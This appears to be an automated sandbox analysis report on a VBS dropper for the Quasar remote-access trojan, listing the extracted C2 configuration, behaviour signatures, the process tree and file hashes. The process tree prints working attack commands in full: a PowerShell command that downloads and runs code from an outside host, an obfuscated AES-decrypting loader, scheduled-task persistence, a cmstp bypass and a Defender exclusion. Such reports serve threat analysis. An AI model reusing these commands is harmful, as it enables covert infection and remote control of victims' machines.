Analysis

  • max time kernel
    98s
  • max time network
    142s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags

    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    09-12-2024 17:28

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

searchindexer

C2

87.120.113.125:55644

Mutex

0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes
  • encryption_key

    54717FCDBD30C7781F669403FBC8E35733C37E34

  • install_name

    searchindexer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    searchindexer

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3844
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4960
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3316
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4788
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA45.tmp" "c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\CSC18256470C90B4AC3BB484DC7ABDEC31.TMP"
            5⤵
              PID:1444
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\rnwlqawr.inf
            4⤵
              PID:696
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5032
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_672_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx672.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3216
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx672.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:748
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx672.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1764
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx672.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:3436
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:3008
                  • C:\Program Files\SubDir\searchindexer.exe
                    "C:\Program Files\SubDir\searchindexer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2844
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:396
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:5068

      Network

      MITRE ATT&CK Enterprise v15

      Downloads

      • C:\Program Files\SubDir\searchindexer.exe

        Filesize

        445KB

        MD5

        2e5a8590cf6848968fc23de3fa1e25f1

        SHA1

        801262e122db6a2e758962896f260b55bbd0136a

        SHA256

        9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

        SHA512

        5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        3eb3833f769dd890afc295b977eab4b4

        SHA1

        e857649b037939602c72ad003e5d3698695f436f

        SHA256

        c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

        SHA512

        c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        129b0eae051e116c39b4a49f152aca98

        SHA1

        a8ee88da2dd6724280dcba08760f311589c25cdd

        SHA256

        f510fc496a4bdb4e8045d66b81620156d51c17b33f6499472c00ac72abcf73ff

        SHA512

        62d480dee86e7a08487afdaba6bef104518fd9ba9ecbcbeb0efab87ac09d7e73aed40b84c40b4d602bf758a895eca6acd6b9dae748ca5010942f93a48f383a3a

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        1KB

        MD5

        6d83099e264e991784509db37bef50fb

        SHA1

        4e6ae1b6529b3f45a898e1d752e0dde880322f2c

        SHA256

        098d22dfe0fba00c551f8d68a5154051291faa5c9441ba805ce2a831ca561b8a

        SHA512

        dd6cb9dc49c9bdaf7e4ba13008199ae04a0de4dae5a2f4eb8ae5fda5983fdf95740f7c04af26750c51fb85ce37d5398eddda818e6eaad8a512d3ffe136a1dc26

      • C:\Users\Admin\AppData\Local\Temp\RESCA45.tmp

        Filesize

        1KB

        MD5

        0e96b130c831f4511e83c2f61540a558

        SHA1

        96a28cb8407d98481848c65122bcf205c66e1495

        SHA256

        24527286a6968ebb4f9b5ab2336238084a756e4f5a88c26679358ad125ea19ee

        SHA512

        172a992528052eb5585ff4d4df45366d8a241ba75203ef13a363425c41eb4e45d9a0983551a86a5e90c82afec7aebfbdcc4db25f8b5add3d23a5a4c734ce2218

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dz1umvwj.rv5.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\c.bat

        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

      • C:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.dll

        Filesize

        4KB

        MD5

        3f729706890ba9ebaa093e6799dadeaa

        SHA1

        148ebf91084662ccf858bcd181a9d6d8ddbd6ac1

        SHA256

        c4e279e3babfe2e8f4734df5b8d1c5acb40ec95f99c4ae31ae2752d2a0b8f971

        SHA512

        d303f02988991a323a15d7e217c7be362dbf1c85c67252669716c3709279fe2d0a2b2d57b9c7e23c4e8383776d0ab86957a83d75bf8adb9b3889b88e52c9d274

      • C:\Users\Admin\AppData\Roaming\latencyx672.vbs

        Filesize

        111B

        MD5

        26b968453e7c562512ecc1b493bd6386

        SHA1

        c2497d82f2e54a4cb4e053d470ae500548dcf1f4

        SHA256

        43b6df2055715721417038c807155be21b071252bea49a6b3781730909d1b936

        SHA512

        a2d92e0f27edf6f118215a9e72683c0d5453bdd2ecdcc2ce8616de79b122d3efb0e16782c8b2339fdceff49f6bdc0b518d964c038257a9a7da92cf84fc3fd5da

      • C:\windows\temp\rnwlqawr.inf

        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\CSC18256470C90B4AC3BB484DC7ABDEC31.TMP

        Filesize

        652B

        MD5

        fa0287dc2c69619b392cf261f7eeb2c2

        SHA1

        98881ff26b455306c49d20404dcdef25612beef0

        SHA256

        bebfc4a1e27ba3fdf4d895281f3b08b162790bf76ea87bfa53116a8ee25c80b8

        SHA512

        5a78e2e5cdd6ab4de5578294acc8ebb2ab39e20113e7f19d9f3c340577631a0d441b24ffdbf5d73001a376ffd15351ffcbc1518e5d718705bf34f87bd6ea98bc

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.0.cs

        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

      • \??\c:\Users\Admin\AppData\Local\Temp\ccqs1yzg\ccqs1yzg.cmdline

        Filesize

        369B

        MD5

        48c9ca7bdbb853dd50cbdb50b801701e

        SHA1

        ec1df40d23f113758f3712a1a06c510daa9a3635

        SHA256

        34549750612eb62a99088da6091655149ac6edec8282dc7086b9203f9338e5a3

        SHA512

        3d61ba319b65767f039d8a4610f9b8d6b94bd51bf0fd67fb918599e958228272a64c5d9d10ba5a7e244bf09f58fce37637d005489ecc69b45a01909b01bfac5b

      • memory/2844-110-0x000001C6732D0000-0x000001C673314000-memory.dmp

        Filesize

        272KB

      • memory/2844-111-0x000001C673320000-0x000001C673396000-memory.dmp

        Filesize

        472KB

      • memory/3316-44-0x00007FFC93643000-0x00007FFC93645000-memory.dmp

        Filesize

        8KB

      • memory/3316-45-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

      • memory/3316-0-0x00007FFC93643000-0x00007FFC93645000-memory.dmp

        Filesize

        8KB

      • memory/3316-49-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

      • memory/3316-27-0x0000021361590000-0x0000021361598000-memory.dmp

        Filesize

        32KB

      • memory/3316-14-0x0000021361560000-0x000002136157C000-memory.dmp

        Filesize

        112KB

      • memory/3316-13-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

      • memory/3316-12-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

      • memory/3316-11-0x00007FFC93640000-0x00007FFC94102000-memory.dmp

        Filesize

        10.8MB

      • memory/3316-1-0x00000213611D0000-0x00000213611F2000-memory.dmp

        Filesize

        136KB

      • memory/3436-98-0x00000223B3EC0000-0x00000223B41E4000-memory.dmp

        Filesize

        3.1MB

      • memory/5032-67-0x000001F6343A0000-0x000001F6343A8000-memory.dmp

        Filesize

        32KB

      • memory/5032-68-0x000001F636AA0000-0x000001F636BD2000-memory.dmp

        Filesize

        1.2MB